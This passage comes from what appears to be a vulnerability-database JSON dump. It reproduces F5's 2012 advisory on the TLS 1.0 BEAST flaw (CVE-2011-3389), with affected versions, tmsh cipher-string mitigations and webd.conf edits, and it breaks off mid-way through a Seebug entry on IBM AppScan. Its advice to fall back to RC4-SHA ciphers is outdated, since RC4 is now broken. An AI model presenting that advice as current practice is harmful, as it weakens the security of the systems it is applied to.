\nBIG-IP AAM | *11.4.0 - 12.1.3 \n*13.0.0 - 13.1.0 | None | Configuration utility \nSSL virtual servers \nFirePass | 6.0.0 - 6.1.0 \n7.0.0 | None | Administrative interface \nWebServices \nEnterprise Manager | 1.8.0 \n2.0.0 - 2.3.0 \n3.0.0 - 3.1.1 | None | Configuration utility \nARX | 5.0.0 - 5.3.1 \n6.0.0 - 6.4.0 | None | ARX Manager GUI \nAPI (disabled by default) \nBIG-IQ Cloud | *4.4.0 - 4.5.0 | None | BIG-IQ user interface (webd) \nBIG-IQ Device | *4.4.0 - 4.5.0 | None | BIG-IQ user interface (webd) \nBIG-IQ Security | *4.4.0 - 4.5.0 | None | BIG-IQ user interface (webd) \nBIG-IQ ADC | *4.5.0 | None | BIG-IQ user interface (webd) \nBIG-IQ Centralized Management | *5.0.0 - 5.4.0 \n*4.6.0 | None | BIG-IQ user interface (webd) \nBIG-IQ Cloud and Orchestration | *1.0.0 | None | BIG-IQ user interface (webd) \nF5 iWorkflow | *2.0.0 - 2.3.0 | None | iWorkflow user interface (webd) \n \n* Mitigation is available for these BIG-IP, BIG-IQ, and iWorkflow versions with the introduction of support for TLS 1.2. For more information, refer to the **Security Advisory Recommended Actions** section.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [BIG-IP](<https://support.f5.com/csp/article/K13400#bigip>)\n * [BIG-IQ/iWorkflow](<https://support.f5.com/csp/article/K13400#bigiq>)\n * [FirePass](<https://support.f5.com/csp/article/K13400#firepass>)\n * [Enterprise Manager](<https://support.f5.com/csp/article/K13400#2.x>)\n * [ARX](<https://support.f5.com/csp/article/K13400#arx>)\n\nBIG-IP\n\nThis vulnerability is exploited on the client-browser side of an SSL connection to either a virtual server or to the Configuration utility. In the case of client-browser access to a virtual server, the vulnerability is exploitable without server access, and no exploited packets are sent to the remote server. The following mitigations for this vulnerability are available for SSL profiles and the Configuration utility:\n\nSSL profiles\n\nMitigation of this vulnerability is possible for virtual servers using an SSL profile by performing one of the following procedures:\n\n * [Configuring the SSL profile to use only TLS 1.1 or TLS 1.2 compatible, or ](<https://support.f5.com/csp/article/K13400#ssl_p1>)[RC4-SHA ciphers](<https://support.f5.com/csp/article/K13400#p1>)\n * TLS 1.1 protocol compatible ciphers are available only for BIG-IP 11.2.0 and later.\n * TLS 1.2 protocol compatible ciphers and RC4-SHA ciphers are available only for BIG-IP 10.2.4 and later, and BIG-IP 11.0.0 and later.\n * [Configuring the SSL profile to use only RC4-SHA ciphers](<https://support.f5.com/csp/article/K13400#ssl_p2>)\n * RC4-SHA ciphers are available for all BIG-IP versions.\n * RC4 ciphers are not FIPS compliant.\n\nConfiguration utility\n\nMitigation of this vulnerability is possible for the Configuration utility by performing one of the following procedures:\n\n * [Restricting the Configuration utility to use only TLS 1.2 compatible or RC4-SHA ciphers](<https://support.f5.com/csp/article/K13400#config_p1>)\n * This option is available only for BIG-IP 11.5.0 and later.\n * Feature enhancements allowing the use of this procedure have also been included in the following software versions: 11.4.1 HF6, 11.4.0 HF9, 11.2.1 HF13, and 10.2.4 HF10.\n * [Restricting the Configuration utility to use only RC4-SHA ciphers](<https://support.f5.com/csp/article/K13400#config_p2>)\n * All BIG-IP versions\n\nConfiguring the SSL profile to use TLS 1.1 or TLS 1.2 compatible ciphers, or RC4-SHA ciphers\n\n**Note**: Support for TLS 1.2 was introduced in BIG-IP 10.2.3 and 11.0.0.\n\nFor BIG-IP 10.2.4 and 11.x, you can mitigate this vulnerability for an SSL virtual server by configuring the SSL profile to use only TLS 1.1-compatible ciphers, TLS 1.2-compatible ciphers, or RC4-SHA ciphers. For information about configuring the ciphers used by an SSL profile, refer to the following articles:\n\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)](<https://support.f5.com/csp/article/K7815>)\n\nFor example, to configure an SSL profile to use only TLS 1.1-compatible ciphers, TLS 1.2-compatible ciphers, or RC4-SHA ciphers, perform the following procedure:\n\n**Note: **When you modify cipher strings, it is helpful to understand the exclamation (**!**) and minus (**-**) negation symbols. When you use the **! **symbol preceding a cipher, the SSL profile permanently removes the cipher from the cipher list, even if it is explicitly stated later in the cipher string. When you use the **\\- **symbol preceding a cipher, the SSL profile removes the cipher from the cipher list, but it can be added back to the cipher list if there are later options that allow it. For more information about building and viewing custom cipher lists, refer to [K15194: Overview of the BIG-IP SSL/TLS cipher suite](<https://support.f5.com/csp/article/K15194>).\n\nConfiguring the SSL profile to use only the RC4-SHA cipher\n\nFor BIG-IP versions that do not support TLS 1.1 or 1.2, you can mitigate this vulnerability for an SSL virtual server by configuring the SSL profile to use only RC4-SHA ciphers. For example, to configure an SSL profile to use only RC4-SHA ciphers, perform the following procedure:\n\n**Impact of workaround:** Only RC4-SHA ciphers are allowed. Limiting the ciphers supported by the SSL profile may result in clients being unable to establish an SSL connection.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Local Traffic** > **Profiles**.\n 3. From the **SSL** list, click **Client**.\n 4. Click **Create**.\n 5. Type a name for the **SSL** profile.\n 6. From the **Parent Profile** menu, choose **clientssl**.\n 7. From the **Configuration** menu, choose **Advanced**.\n 8. Click the **Custom** box for **Ciphers**.\n 9. Delete the DEFAULT cipher string from the **Ciphers** box.\n 10. Enter the desired cipher string in the **Ciphers** box. \n\nFor example, the following string would configure an SSL profile to use only RC4-SHA ciphers:\n\nRC4-SHA\n\n 11. Click **Finished**. \n\nYou must now associate the SSL profile with the virtual server.\n\n**Note**: Alternatively, to configure an SSL profile to use only RC4-SHA ciphers using the** **TMOS Shell (**tmsh**), use the following syntax:\n\ntmsh create /ltm profile client-ssl <name> ciphers RC4-SHA\n\nRestricting the Configuration utility to use only TLS 1.2 compatible or RC4-SHA ciphers\n\n**Note**: Support for TLS 1.2 in the Configuration utility was introduced in BIG-IP 11.5.0.\n\nFor BIG-IP 11.5.0 and later, you can mitigate this vulnerability for the Configuration utility by restricting the utility to use only TLS 1.2-compatible ciphers or RC4-SHA ciphers. For example, to restrict the utility to use only TLS 1.2-compatible ciphers or RC4-SHA ciphers, perform the following procedure:\n\n**Note**: Feature enhancements allowing the use of this procedure have also been included in the following software versions: 11.4.1 HF6, 11.4.0 HF9, 11.2.1 HF13, and 10.2.4 HF10.\n\n**Impact of workaround**: The Configuration utility will use only TLS 1.2-compatible ciphers or RC4-SHA ciphers. There is limited client browser support for TLS 1.2. Clients who do not support TLS 1.2 may not be able to connect, or will connect using an RC4-SHA cipher.\n\n**Important**: Many client browsers do not support TLS 1.2.\n\n 1. Log in to **tmsh** by typing the following command: \n\ntmsh\n\n 2. Before you change the SSL cipher string, you should review the existing string for your specific BIG-IP version. To list the currently configured cipher string, type the following command: \n\nlist /sys httpd ssl-ciphersuite\n\nFor example, the BIG-IP 11.5.1 system displays the following cipher string:\n\nALL:!ADH:!EXPORT:!eNULL:!MD5:!DES:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2\n\n 3. To restrict Configuration utility access to clients using TLS 1.2 or RC4-SHA ciphers, type the following command: \n\nmodify /sys httpd ssl-ciphersuite 'ALL:!ADH:!EXPORT:!eNULL:!MD5:!DES:!SSLv2:-TLSv1:-SSLv3:RC4-SHA'\n\nAlternatively, if you can restrict to only TLS 1.1 and TLS 1.2 ciphers, then type the following command instead:\n\nmodify /sys httpd ssl-ciphersuite 'ALL:!ADH:!EXPORT:!eNULL:!MD5:!DES:!SSLv2:!SSLv3:!TLSv1'\n\n 4. Save the configuration change by typing the following command: \n\nsave /sys config\n\nRestricting the Configuration utility to use only RC4-SHA ciphers\n\nFor BIG-IP versions that do not support TLS 1.2, you can mitigate this vulnerability for the Configuration utility by restricting the utility to use only RC4-SHA ciphers. For example, to restrict the utility to use only RC4-SHA ciphers, perform the following procedure:\n\n**Impact of workaround**: Only RC4-SHA ciphers are allowed. Limiting the ciphers supported by The Configuration utility may result in clients being unable to connect.\n\n 1. Log in to **tmsh** by typing the following command: \n\ntmsh\n\n 2. Before you change the SSL cipher string, you should review the existing string for your specific BIG-IP version. To list the currently configured cipher string, type the following command: \n\nlist /sys httpd ssl-ciphersuite\n\nFor example, the BIG-IP 11.5.1 system displays the following cipher string:\n\nALL:!ADH:!EXPORT:!eNULL:!MD5:!DES:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2\n\n 3. To restrict Configuration utility access to clients using RC4-SHA ciphers, type the following command: \n\nmodify /sys httpd ssl-ciphersuite 'RC4-SHA'\n\n 4. Save the configuration change by typing the following command: \n\nsave /sys config\n\nBIG-IQ/iWorkflow\n\nThis vulnerability is exploited on the client-browser side of an SSL connection to the BIG-IQ or iWorkflow user interface. Mitigation of this vulnerability is available for the BIG-IQ and iWorkflow user interface by removing all SSL and TLS 1.0 protocols from the BIG-IQ or iWorkflow user interface configuration. To do so, perform the following procedure:\n\n**Impact of workaround**: This procedure restarts the **webd** process and temporarily disrupts traffic to the BIG-IQ or iWorkflow system. You should perform this procedure during a maintenance window.\n\n 1. Log in to the BIG-IQ or iWorkflow command line.\n 2. Back up a copy of the **/etc/webd/webd.conf** file by typing the following command: \n\ncp -p /etc/webd/webd.conf /var/tmp/webd.conf.k13400\n\n 3. Edit the **/etc/webd/webd.conf** file using a text editor of your choice, for example **vi**.\n 4. In the **/etc/webd/webd.conf** file, locate the following line: \n\nssl_protocols SSLv2 SSLv3 TLSv1 TLSv1.1 TLSv1.2;\n\n 5. Remove all SSL and TLS 1.0 protocols from this line. After editing, this line should appear similar to the following example: \n\nssl_protocols TLSv1.1 TLSv1.2;\n\n 6. Save the changes and exit the text editor.\n 7. Restart the **webd** process by typing the following command: \n\ntmsh restart sys service webd\n\nFirePass\n\n * None\n\n****Enterprise Manager\n\n * None\n\n****ARX\n\n * None\n\n * [K8802: Using SSL ciphers with BIG-IP Client SSL and Server SSL profiles](<https://support.f5.com/csp/article/K8802>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K13405: Restricting Configuration utility access to clients using high encryption SSL ciphers (11.x)](<https://support.f5.com/csp/article/K13405>)\n * [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>)\n * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n * [K11444: SSL ciphers supported on BIG-IP platforms (10.x)](<https://support.f5.com/csp/article/K11444>)\n * [K13156: SSL ciphers used in the default SSL profiles (11.x - 13.x)](<https://support.f5.com/csp/article/K13156>)\n * [K10262: SSL ciphers used in the default SSL profiles (10.x)](<https://support.f5.com/csp/article/K10262>)\n * [K9677: BIG-IP LTM compliance with standard FIPS-197](<https://support.f5.com/csp/article/K9677>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n\n**Note**: The following link takes you to a resource outside of AskF5, and it is possible that the documents may be removed without our knowledge.\n\n * <http://vnhacker.blogspot.com/2011/09/beast.html>\n\n**Note**: For more information about various TLS protocol level attacks and F5 recommendations for mitigating the attacks, refer to the following DevCentral article. A DevCentral login is required to access this content.\n\n * [Which TLS algorithm should I use?](<https://devcentral.f5.com/articles/which-tls-algorithm-should-i-use#.UiZGfF3n-Ul>)\n", "edition": 1, "reporter": "f5", "published": "2012-03-07T05:33:00", "title": "SSL 3.0/TLS 1.0 vulnerability CVE-2011-3389 and TLS protocol vulnerability CVE-2012-1870", "type": "f5", "enchantments": {"score": {"modified": "2018-09-13T21:51:37", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2011-3389", "CVE-2012-1870"], "modified": "2018-08-29T18:42:00", "id": "F5:K13400", "href": "https://support.f5.com/csp/article/K13400", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:00", "references": ["https://support.f5.comhttps://devcentral.f5.com/articles/which-tls-algorithm-should-i-use#.UiZGfF3n-Ul", "https://support.f5.comhttp://vnhacker.blogspot.com/2011/09/beast.html", "https://support.f5.com/kb/en-us/solutions/public/11000/400/sol11444.html", "https://support.f5.com/kb/en-us/solutions/public/13000/400/sol13405.html", "https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13163.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13156.html", "https://support.f5.com/kb/en-us/solutions/public/7000/800/sol7815.html", "https://support.f5.com/kb/en-us/solutions/public/8000/800/sol8802.html", "https://support.f5.com/kb/en-us/solutions/public/10000/200/sol10262.html", "https://support.f5.com/kb/en-us/solutions/public/13000/300/sol13309.html", "https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13171.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html", "https://support.f5.com/kb/en-us/solutions/public/9000/600/sol9677.html"], "edition": 1, "description": "If the previous table lists a version in the** Versions known to be not vulnerable **column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 is responding to this vulnerability as determined by the parameters defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\n * BIG-IP\n * FirePass\n * Enterprise Manager\n * ARX\n\nVulnerability Recommended Actions\n\n**BIG-IP**\n\nThis vulnerability is exploited on the client-browser side of an SSL connection to either a virtual server or to the Configuration utility. In the case of client-browser access to a virtual server, the vulnerability is exploitable without server access, and no exploited packets are sent to the remote server. The following mitigations for this vulnerability are available for SSL profiles and the Configuration utility:\n\n**SSL Profiles**\n\nMitigation of this vulnerability is possible for virtual servers using an SSL profile by performing one of the following procedures:\n\n * Configuring the SSL profile to use only TLS 1.1 or TLS 1.2 compatible, or RC4-SHA ciphers \n \n\n * TLS 1.1 protocol compatible ciphers are available only for BIG-IP 11.2.0 and later.\n * TLS 1.2 protocol compatible ciphers and RC4-SHA ciphers are available only for BIG-IP 10.2.4 and later, and BIG-IP 11.0.0 and later.\n * Configuring the SSL profile to use only RC4-SHA ciphers \n \n\n * RC4-SHA ciphers are available for all BIG-IP versions.\n * RC4 ciphers are not FIPS compliant.\n\n**Configuration utility**\n\nMitigation of this vulnerability is possible for the Configuration utility by performing one of the following procedures:\n\n * Restricting the Configuration utility to use only TLS 1.2 compatible or RC4-SHA ciphers \n \n\n * This option is available only for BIG-IP 11.5.0 and later.\n * Feature enhancements allowing the use of this procedure have also been included in the following software versions: 11.4.1 HF6, 11.4.0 HF9, 11.2.1 HF13, and 10.2.4 HF10.\n * Restricting the Configuration utility to use only RC4-SHA ciphers \n \n\n * All BIG-IP versions\n\n**Configuring the SSL profile to use TLS 1.1 or TLS 1.2 compatible ciphers, or RC4-SHA ciphers**\n\n**Note**: Support for TLS 1.2 was introduced in BIG-IP 10.2.3 and 11.0.0.\n\nFor BIG-IP 10.2.4 and 11.x, you can mitigate this vulnerability for an SSL virtual server by configuring the SSL profile to use only TLS 1.1-compatible ciphers, TLS 1.2-compatible ciphers, or RC4-SHA ciphers. For information about configuring the ciphers used by an SSL profile, refer to the following articles:\n\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)\n\nFor example, to configure an SSL profile to use only TLS 1.1-compatible ciphers, TLS 1.2-compatible ciphers, or RC4-SHA ciphers, perform the following procedure:\n\n**Note**: This workaround cannot be applied to BIG-IP 10.2.3. For more information, refer to SOL13543: The BIG-IP SSL profiles may not allow cipher strings containing AES128, AES256, or TLS1.2.\n\n**Impact of workaround:** An SSL virtual server configured to use this SSL profile will use only TLS 1.1-compatible ciphers, TLS 1.2-compatible ciphers, or RC4-SHA ciphers. There is limited client browser support for TLS 1.2. Clients who do not support TLS 1.1 or 1.2 may not be able to connect, or will connect using an RC4-SHA cipher. However, RC4 ciphers are not FIPS compliant.\n\n**Important**: Many client browsers do not support TLS 1.2.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Local Traffic** > **Profiles**.\n 3. Choose **Client** from the **SSL** menu.\n 4. Click **Create**.\n 5. Type a name for the **SSL** profile.\n 6. From the **Parent Profile** menu, choose **clientssl**.\n 7. From the **Configuration** menu, choose **Advanced**.\n 8. Click the **Custom** box for **Ciphers**.\n 9. Delete the DEFAULT cipher string from the **Ciphers** box.\n 10. Enter the desired cipher string in the **Ciphers** box. \n\nFor example, the following string can configure an SSL profile to use only TLS 1.1-compatible and TLS 1.2-compatible ciphers:\n\nDEFAULT:!SSLv3:!TLSv1 \n \nIf you want the SSL profile to support TLS 1.0 and SSL 3.0 clients, use the following string: \n \nDEFAULT:-SSLv3:-TLSv1:RC4-SHA \n \nIf you want the SSL profile to support TLS 1.0, but not SSL 3.0 clients, use the following string: \n \nDEFAULT:!SSLv3:-TLSv1:RC4-SHA\n\n 11. Click **Finished**. \n\nYou must now associate the SSL profile with the virtual server.\n\nAlternatively, to configure an SSL profile to use only TLS 1.1-compatible and TLS 1.2-compatible ciphers using the** tmsh **utility, use the following syntax:\n\ntmsh create /ltm profile client-ssl <name> ciphers DEFAULT:!SSLv3:!TLSv1 \n \nSimilarly, if you want the SSL profile to support TLS 1.0 and SSL 3.0 clients, you can configure an SSL profile using the following **tmsh **command syntax: \n \ntmsh create /ltm profile client-ssl <name> ciphers DEFAULT:-SSLv3:-TLSv1:RC4-SHA \n \nAnd if you want the SSL profile to support TLS 1.0, but not SSL 3.0 clients, you can configure an SSL profile using the following **tmsh **command syntax: \n \ntmsh create /ltm profile client-ssl <name> ciphers DEFAULT:!SSLv3:-TLSv1:RC4-SHA\n\n******Configuring the SSL profile to use only the RC4-SHA cipher**\n\nFor BIG-IP versions that do not support TLS 1.1 or 1.2, you can mitigate this vulnerability for an SSL virtual server by configuring the SSL profile to use only RC4-SHA ciphers. For example, to configure an SSL profile to use only RC4-SHA ciphers, perform the following procedure:\n\n**Impact of workaround:** Only RC4-SHA ciphers are allowed. Limiting the ciphers supported by the SSL profile may result in clients being unable to establish an SSL connection.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Local Traffic** > **Profiles**.\n 3. From the **SSL** menu, choose **Client**.\n 4. Click **Create**.\n 5. Type a name for the **SSL** profile.\n 6. From the **Parent Profile** menu, choose **clientssl**.\n 7. From the **Configuration** menu, choose **Advanced**.\n 8. Click the **Custom** box for **Ciphers**.\n 9. Delete the DEFAULT cipher string from the **Ciphers** box.\n 10. Enter the desired cipher string in the **Ciphers** box. \n\nFor example, the following string would configure an SSL profile to use only RC4-SHA ciphers:\n\nRC4-SHA\n\n 11. Click **Finished**. \n\nYou must now associate the SSL profile with the virtual server.\n\n**Note**: Alternatively, to configure an SSL profile to use only RC4-SHA ciphers using the** tmsh **utility, use the following syntax:\n\ntmsh create /ltm profile client-ssl <name> ciphers RC4-SHA\n\n**Restricting the Configuration utility to use only TLS 1.2 compatible or RC4-SHA ciphers**\n\n**Note**: Support for TLS 1.2 in the Configuration utility was introduced in BIG-IP 11.5.0. \n \nFor BIG-IP 11.5.0 and later, you can mitigate this vulnerability for the Configuration utility by restricting the utility to use only TLS 1.2-compatible ciphers or RC4-SHA ciphers. For example, to restrict the utility to use only TLS 1.2-compatible ciphers or RC4-SHA ciphers, perform the following procedure:\n\n**Note**: Feature enhancements allowing the use of this procedure have also been included in the following software versions: 11.4.1 HF6, 11.4.0 HF9, 11.2.1 HF13, and 10.2.4 HF10.\n\n**Impact of workaround**: The Configuration utility will use only TLS 1.2-compatible ciphers or RC4-SHA ciphers. There is limited client browser support. TLS 1.2.Clients who do not support TLS 1.2 may not be able to connect, or will connect using an RC4-SHA cipher.\n\n**Important**: Many client browsers do not support TLS 1.2.\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. Before you change the SSL cipher string, you should review the existing string for your specific BIG-IP version. To list the currently configured cipher string, type the following command: \n\nlist /sys httpd ssl-ciphersuite\n\nFor example, the BIG-IP 11.5.1 system displays the following cipher string: \n\nALL:!ADH:!EXPORT:!eNULL:!MD5:!DES:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2\n\n 3. To restrict Configuration utility access to clients using TLS 1.2 or RC4-SHA ciphers, type the following command: \n\nmodify /sys httpd ssl-ciphersuite 'ALL:!ADH:!EXPORT:!eNULL:!MD5:!DES:!SSLv2:-TLSv1:-SSLv3:RC4-SHA' \n \nAlternatively, if you can restrict to only TLS 1.1 and TLS 1.2 ciphers, then type the following command instead: \n \nmodify /sys httpd ssl-ciphersuite 'ALL:!ADH:!EXPORT:!eNULL:!MD5:!DES:!SSLv2:!SSLv3:!TLSv1'\n\n 4. Save the configuration change by typing the following command: \n\nsave /sys config\n\n**Restricting the Configuration utility to use only RC4-SHA ciphers**\n\nFor BIG-IP versions that do not support TLS 1.2, you can mitigate this vulnerability for the Configuration utility by restricting the utility to use only RC4-SHA ciphers. For example, to restrict the utility to use only RC4-SHA ciphers, perform the following procedure:\n\n**Impact of workaround**: Only RC4-SHA ciphers are allowed. Limiting the ciphers supported by The Configuration utility may result in clients being unable to connect.\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. Before you change the SSL cipher string, you should review the existing string for your specific BIG-IP version. To list the currently configured cipher string, type the following command: \n\nlist /sys httpd ssl-ciphersuite\n\nFor example, the BIG-IP 11.5.1 system displays the following cipher string: \n\nALL:!ADH:!EXPORT:!eNULL:!MD5:!DES:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2\n\n 3. To restrict Configuration utility access to clients using RC4-SHA ciphers, type the following command: \n\nmodify /sys httpd ssl-ciphersuite 'RC4-SHA'\n\n 4. Save the configuration change by typing the following command: \n\nsave /sys config\n\n**FirePass**\n\n * None\n\n**Enterprise Manager**\n\n * None\n\n**ARX**\n\n * None\n\nSupplemental Information\n\n * SOL8802: Using SSL ciphers with BIG-IP Client SSL and Server SSL profiles\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)\n * SOL13405: Restricting Configuration utility access to clients using high encryption SSL ciphers (11.x)\n * SOL13309: Restricting access to the Configuration utility by source IP address (11.x)\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL11444: SSL ciphers supported on BIG-IP platforms (10.x)\n * SOL13156: SSL ciphers used in the default SSL profiles (11.x)\n * SOL10262: SSL ciphers used in the default SSL profiles (10.x)\n * SOL9677: BIG-IP LTM compliance with standard FIPS-197\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n**Note**: The following link takes you to a resource outside of AskF5, and it is possible that the documents may be removed without our knowledge.\n\n * <http://vnhacker.blogspot.com/2011/09/beast.html>\n\n**Note**: For more information about various TLS protocol level attacks and F5 recommendations for mitigating the attacks, refer to the following DevCentral article:\n\n * [Which TLS algorithm should I use?](<https://devcentral.f5.com/articles/which-tls-algorithm-should-i-use#.UiZGfF3n-Ul>)\n", "reporter": "f5", "published": "2012-03-06T00:00:00", "title": "SOL13400 - SSL 3.0/TLS 1.0 BEAST vulnerability CVE-2011-3389 and TLS protocol vulnerability CVE-2012-1870", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP WebAccelerator", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AAM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP AFM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "9.4.8", "operator": "le"}, {"name": "BIG-IP APM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.6.0", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "9.4.8", "operator": "le"}, {"name": "Enterprise Manager", "version": "3.1.1", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.2", "operator": "le"}, {"name": "FirePass", "version": "6.1.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "12.0.0", "operator": "le"}, {"name": "FirePass", "version": "7.0.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "Enterprise Manager", "version": "2.3.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.2", "operator": "le"}, {"name": "Enterprise Manager", "version": "1.8.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP GTM", "version": "9.4.8", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PEM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "9.4.8", "operator": "le"}, {"name": "BIG-IP LTM", "version": "9.4.8", "operator": "le"}, {"name": "BIG-IP DNS", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP LTM", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "ARX", "version": "6.4.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.2", "operator": "le"}, {"name": "BIG-IP PSM", "version": "9.4.8", "operator": "le"}, {"name": "ARX", "version": "5.3.1", "operator": "le"}, {"name": "BIG-IP ASM", "version": "12.0.0", "operator": "le"}], "cvelist": ["CVE-2011-3389", "CVE-2012-1870"], "modified": "2016-06-28T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/400/sol13400.html", "id": "SOL13400", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T21:33:03", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID: CVE-2011-3389,CVE-2011-3516,CVE-2011-3521,CVE-2011-3544,CVE-2011-3545,CVE-2011-3546,CVE-2011-3547,CVE-2011-3548,CVE-2011-3549,CVE-2011-3550,CVE-2011-3551,CVE-2011-3552,CVE-2011-3553,CVE-2011-3554,CVE-2011-3556,CVE-2011-3557,CVE-2011-3560,CVE-2011-3561,CVE-2011-3563,CVE-2011-5035,CVE-2012-0497,CVE-2012-0498,CVE-2012-0499,CVE-2012-0500,CVE-2012-0501,CVE-2012-0502,CVE-2012-0503,CVE-2012-0505,CVE-2012-0506,CVE-2012-0507,CVE-2012-0732,CVE-2012-2159,CVE-2012-2161\r\n\r\nIBM Rational AppScan\u662f\u5e94\u7528\u5b89\u5168\u6027\u8f6f\u4ef6\uff0c\u80fd\u591f\u5728\u5f00\u53d1\u7684\u5404\u4e2a\u9636\u6bb5\u626b\u63cf\u5e76\u6d4b\u8bd5\u6240\u6709\u5e38\u89c1\u7684Web\u5e94\u7528\u6f0f\u6d1e\u3002\r\n\r\nIBM Rational AppScan 8.6\u4e4b\u524d\u7248\u672c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u53ef\u88ab\u6076\u610f\u7528\u6237\u5229\u7528\u6cc4\u9732\u654f\u611f\u4fe1\u606f\u3001\u6267\u884c\u6b3a\u9a97\u548cXSS\u653b\u51fb\u3001\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\u3001\u5bf9DNS\u7f13\u5b58\u6295\u6bd2\u3001\u64cd\u4f5c\u67d0\u4e9b\u6570\u636e\u3001\u9020\u6210\u62d2\u7edd\u670d\u52a1\u548c\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\u3002\n0\nIBM Rational AppScan 8.x\r\nIBM Rational AppScan 7.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nIBM\r\n---\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.ers.ibm.com/", "reporter": "Root", "published": "2012-06-16T00:00:00", "title": 